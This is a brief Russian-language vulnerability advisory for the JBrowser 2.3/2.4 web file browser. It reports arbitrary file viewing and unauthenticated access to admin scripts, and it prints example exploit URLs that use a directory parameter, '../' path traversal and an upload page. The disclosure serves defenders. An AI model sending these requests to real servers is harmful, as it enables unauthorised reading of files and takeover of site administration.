Программа: JBrowser 2.3 и 2.4
Две уязвимости обнаружены в JBrowser. Удаленный пользователь может просматривать произвольные файлы с привилегиями Web сервера. Удаленный пользователь может также получить доступ к административным сценариям в конфигурации по умолчанию.
1. Просмотр произвольных файлов:
http://[target]/browser.php?directory=[ATTACKER_SPECIFIED_PATH]
2. Доступ к административным сценариям:
http://[target]/_admin/
http://[target]/_admin/list_all.php?folder=../
http://[target]/_admin/upload.php